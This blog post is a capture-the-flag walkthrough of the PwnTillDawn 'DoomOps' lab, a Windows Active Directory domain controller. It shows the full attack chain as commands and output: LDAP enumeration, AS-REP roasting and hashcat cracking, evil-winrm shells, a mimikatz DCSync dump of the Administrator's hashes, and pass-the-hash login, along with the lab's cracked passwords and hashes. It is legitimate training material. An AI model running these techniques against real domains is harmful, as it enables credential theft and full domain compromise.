Post

DoomOps

PwnTillDawn Machine ➡️   Easy
                          #Active Directory  #BloodHound  #CrackMapExec  #GetNPUsers.py  #LDAP  #Mimikatz  #SMB  #ldapsearch                   

Port Scan Results ⤵️

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/Doomops]
└─$ nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.150.150.66
Nmap scan report for 10.150.150.66
Host is up (0.18s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-30 07:18:44Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: DOOMOPS.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: DOOMOPS.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-09-30T07:20:14+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC-DOOMOPS.DOOMOPS.LOCAL
| Not valid before: 2023-09-29T04:10:50
|_Not valid after:  2024-03-30T04:10:50
| rdp-ntlm-info: 
|   Target_Name: DOOMOPS
|   NetBIOS_Domain_Name: DOOMOPS
|   NetBIOS_Computer_Name: DC-DOOMOPS
|   DNS_Domain_Name: DOOMOPS.LOCAL
|   DNS_Computer_Name: DC-DOOMOPS.DOOMOPS.LOCAL
|   DNS_Tree_Name: DOOMOPS.LOCAL
|   Product_Version: 10.0.17763
|_  System_Time: 2023-09-30T07:19:35+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49680/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
50131/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC-DOOMOPS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-30T07:19:36
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

LDAP Enumeration ⤵️

I looked for SMB open ports and tried for anonymous login but no luck →

1
2
3
4
5
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ crackmapexec smb 10.150.150.66 -u '' -p '' -d DOOMOPS.LOCAL --shares 
SMB         10.150.150.66   445    DC-DOOMOPS       [*] Windows 10.0 Build 17763 x64 (name:DC-DOOMOPS) (domain:DOOMOPS.LOCAL) (signing:True) (SMBv1:False)
SMB         10.150.150.66   445    DC-DOOMOPS       [+] DOOMOPS.LOCAL\: 
SMB         10.150.150.66   445    DC-DOOMOPS       [-] Error enumerating shares: STATUS_ACCESS_DENIED

Now I do not have username and password , the things I have is IP address and domain name from crackmapexec or got it from Nmap scan results →

So Lets do a ldapsearch command →

1
2
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ ldapsearch -x -H ldap://10.150.150.66 -b 'DC=doomops,DC=local' > ldapsearch.txt

And with that scan I got the FLAG4 and got some usernames like these →

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ cat ldapsearch.txt | grep -- name | cut -f 2 -d ':'
 Guest
 Revenant
 Cacodemon
 Cyberdemon
 Spectre
 Macubus
 Hellhound
 Spiderdemon

I removed the spaces and the Capital-Letters and saved it as names.txt file →

Now Its time to look for password and that can be have with GetNPUsers.py command , that will give me the kerberute password in its hash format like this →

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ GetNPUsers.py -dc-ip 10.150.150.66 doomops.local/ -no-pass -usersfile names.txt -outputfile hashes.txt 
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$revenant@DOOMOPS.LOCAL:a2050aa464bddaff674b1ede36cefe01$54258c42f59af47d17c1b2cae4d2f494030c5df88a09ab05657f455b49eb430bd7830f2631fadec120cbfa849d4a42bf0622af12d1f6904445e6e3e7f704ab212678a9fe13460d672553276257822a31ddd9b8231ddc3db024af11c9d59d25eeb2a3f261acc0a8e912aa5d8d6d315b6f444b00f3fe653667638ac71f279973f5f3022e80899986185c0293ba148468410cd91acf6150321e29798591260a89a2ad0c634dfbc9fdce40282fce142ded05918fe8a65a48e63f835dca388eca8457ca06854e9f6edc030789bfdb58f5d617e8a178cdf206ee95907e95220244e8cbf25b3530df2470fbecf2a494fc32
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User cyberdemon doesnt have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

Now lets decode this hash value of user revenant , with hashcat Tool →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz, 2913/5891 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

...
...
$krb5asrep$23$revenant@DOOMOPS.LOCAL:a2050aa464bddaff674b1ede36cefe01$54258c42f59af47d17c1b2cae4d2f494030c5df88a09ab05657f455b49eb430bd7830f2631fadec120cbfa849d4a42bf0622af12d1f6904445e6e3e7f704ab212678a9fe13460d672553276257822a31ddd9b8231ddc3db024af11c9d59d25eeb2a3f261acc0a8e912aa5d8d6d315b6f444b00f3fe653667638ac71f279973f5f3022e80899986185c0293ba148468410cd91acf6150321e29798591260a89a2ad0c634dfbc9fdce40282fce142ded05918fe8a65a48e63f835dca388eca8457ca06854e9f6edc030789bfdb58f5d617e8a178cdf206ee95907e95220244e8cbf25b3530df2470fbecf2a494fc32:doomhammer211*
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$revenant@DOOMOPS.LOCAL:a2050aa464bdda...94fc32
Time.Started.....: Sat Sep 30 14:21:00 2023 (14 secs)
Time.Estimated...: Sat Sep 30 14:21:14 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   745.0 kH/s (1.01ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8536064/14344385 (59.51%)
Rejected.........: 0/8536064 (0.00%)
Restore.Point....: 8535040/14344385 (59.50%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: dooneyg11 -> doogie08
Hardware.Mon.#1..: Util: 79%

Now its time for SMB recon →

SMB Enumeration ⤵️

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ crackmapexec smb 10.150.150.66 -u 'revenant' -p 'doomhammer211*' -d DOOMOPS.LOCAL --shares
SMB         10.150.150.66   445    DC-DOOMOPS       [*] Windows 10.0 Build 17763 x64 (name:DC-DOOMOPS) (domain:DOOMOPS.LOCAL) (signing:True) (SMBv1:False)
SMB         10.150.150.66   445    DC-DOOMOPS       [+] DOOMOPS.LOCAL\revenant:doomhammer211* 
SMB         10.150.150.66   445    DC-DOOMOPS       [+] Enumerated shares
SMB         10.150.150.66   445    DC-DOOMOPS       Share           Permissions     Remark
SMB         10.150.150.66   445    DC-DOOMOPS       -----           -----------     ------
SMB         10.150.150.66   445    DC-DOOMOPS       ADMIN$                          Remote Admin
SMB         10.150.150.66   445    DC-DOOMOPS       C$                              Default share
SMB         10.150.150.66   445    DC-DOOMOPS       IPC$            READ            Remote IPC
SMB         10.150.150.66   445    DC-DOOMOPS       NETLOGON        READ            Logon server share 
SMB         10.150.150.66   445    DC-DOOMOPS       SYSVOL          READ            Logon server share

Lets open it with smbclient Tool →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ smbclient -L \\\\10.150.150.66\\ -U revenant   
Password for [WORKGROUP\revenant]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.150.150.66 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ smbclient //10.150.150.66/SYSVOL -U revenant
Password for [WORKGROUP\revenant]:
Try "help" to get a list of possible commands.
smb: \> ls -al
NT_STATUS_NO_SUCH_FILE listing \-al
smb: \> ls
  .                                   D        0  Fri Oct 23 00:15:50 2020
  ..                                  D        0  Fri Oct 23 00:15:50 2020
  DOOMOPS.LOCAL                      Dr        0  Fri Oct 23 00:15:50 2020

		5609471 blocks of size 4096. 2224945 blocks available
smb: \>

Now I have SMB access so lets also try for the evil-winrm for shell access →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(kalikali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ evil-winrm -i 10.150.150.66 -u 'revenant' -p 'doomhammer211*'                   
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\revenant\Documents> dir
*Evil-WinRM* PS C:\Users\revenant\Documents> whoami
doomops\revenant
*Evil-WinRM* PS C:\Users\revenant\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ============================================
doomops\revenant S-1-5-21-1663250433-20091270-1145847307-1103

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\revenant\Documents>

I ran winPEAS then and got AutoLogon credentials →

Untitled

1
2
{: .nolineno}
cyberdemon : Ocz%F972q%eU

Now lets see what permission does cyberdemon got and which group it is a part of that all can be found through BloodHound →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.66/BloodHound]
└─$ sudo bloodhound-python -d 'doomops.local' -u cyberdemon -p 'Ocz%F972q%eU' -ns 10.150.150.66 -c all
[sudo] password for kali: 
INFO: Found AD domain: doomops.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc-doomops.doomops.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc-doomops.doomops.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 11 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: attackersystem.doomops.local
INFO: Querying computer: DC-DOOMOPS.DOOMOPS.LOCAL
WARNING: Could not resolve: attackersystem.doomops.local: The DNS query name does not exist: attackersystem.doomops.local.
WARNING: Failed to get service ticket for DC-DOOMOPS.DOOMOPS.LOCAL, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: [Errno Connection error (dc-doomops.doomops.local:88)] [Errno -2] Name or service not known
INFO: Done in 00M 37S

Untitled

The user cyberdemon can perform DCSync attack →

Untitled

Now lets run mimikatz in this system →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
*Evil-WinRM* PS C:\Users\cyberdemon\Documents> ./mimi32.exe "lsadump::dcsync /domain:doomops.local /user:Administrator" exit

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:doomops.local /user:Administrator
[DC] 'doomops.local' will be the domain
[DC] 'DC-DOOMOPS.DOOMOPS.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/22/2020 10:07:48 AM
Object Security ID   : S-1-5-21-1663250433-20091270-1145847307-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 9e4e2dac5807fb745533e0dda18bfbf6

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 6c5ded97fdc01db3821c82133955d3ff

* Primary:Kerberos-Newer-Keys *
    Default Salt : WIN-M6B2MLRMAV2Administrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 607d0d2a033f168a27f0c264bd78ddcbe6270668a9548268f5f10215c2d3579e
      aes128_hmac       (4096) : 4cf85bcc3bd2ca2e3c5a3b8f6a65a661
      des_cbc_md5       (4096) : 70373d546be92a80

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WIN-M6B2MLRMAV2Administrator
    Credentials
      des_cbc_md5       : 70373d546be92a80

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\Users\cyberdemon\Documents>

Now lets try Evil-Winrm for Administrator with hash value →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
┌──(kalikali)-[~/Downloads/PwnTillDawn/10.150.150.66]
└─$ evil-winrm -i 10.150.150.66 -u 'Administrator' -H '9e4e2dac5807fb745533e0dda18bfbf6'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ===========================================
doomops\administrator S-1-5-21-1663250433-20091270-1145847307-500

GROUP INFORMATION
-----------------

Group Name                                     Type             SID                                         Attributes
============================================== ================ =========================================== ===============================================================
Everyone                                       Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                         Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                  Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access     Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                           Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users               Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                 Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
DOOMOPS\Domain Admins                          Group            S-1-5-21-1663250433-20091270-1145847307-512 Mandatory group, Enabled by default, Enabled group
DOOMOPS\Group Policy Creator Owners            Group            S-1-5-21-1663250433-20091270-1145847307-520 Mandatory group, Enabled by default, Enabled group
DOOMOPS\Enterprise Admins                      Group            S-1-5-21-1663250433-20091270-1145847307-519 Mandatory group, Enabled by default, Enabled group
DOOMOPS\Schema Admins                          Group            S-1-5-21-1663250433-20091270-1145847307-518 Mandatory group, Enabled by default, Enabled group
DOOMOPS\Denied RODC Password Replication Group Alias            S-1-5-21-1663250433-20091270-1145847307-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication               Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level           Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
doomops\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Now I am Administrator or can say Admin too 🤫 !!

If you have any questions or suggestions, please leave a comment below. Thank You !

This post is licensed under CC BY 4.0 by the author.